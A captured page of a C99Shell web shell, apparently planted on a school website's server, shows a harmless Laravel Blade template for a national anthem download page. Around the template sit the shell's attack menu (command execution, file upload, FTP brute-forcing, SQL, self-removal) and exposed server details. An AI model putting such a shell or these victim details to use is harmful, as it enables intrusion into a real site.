!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/frontend/   drwxr-xr-x
Free 29.28 GB of 117.98 GB (24.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     national_anthem.blade.php (1.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@section('title')
    {{get_school_name()}}
@endsection


@section('css')

    <style>
.details_right {
    background: #486b4c !important;
}
.button-sec {
    margin: 20px;
}
.national-anthem-download {
    padding: 10px 24px;
    background: #75a50f;
    border-radius: 10px;
    color: #fff;
    font-size: 20px;
    font-weight: 600;
}
.national-anthem-download:hover{
    color: #bababa;
}
    </style>

@endsection

@extends('frontend.index')
@section('content')
    @php

        $bannerSliderSection = json_decode(get_settings('banner_slider_section'));
        $head_teacher_message_section = json_decode(get_settings('head_teacher_message_sec'));
        $about_school_sec = json_decode(get_settings('about_school_sec'));
        $national_anthem = json_decode(get_settings('national_anthem'));

    @endphp


    <div class="leftCon">
        <h2>জাতীয় সংগীত</h2>


        <div class="details">

            <div class="button-sec">
                @if (isset($national_anthem) && isset($national_anthem->national_anthem_audio_file))
                   @php
                        $file = $national_anthem->national_anthem_audio_file;
                   @endphp
              <a href="{{route('national.anthem.download',[$file])}}" class="national-anthem-download">download</a>
                @endif
            </div>

        </div>

    </div>


@endsection

@section('js')


@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--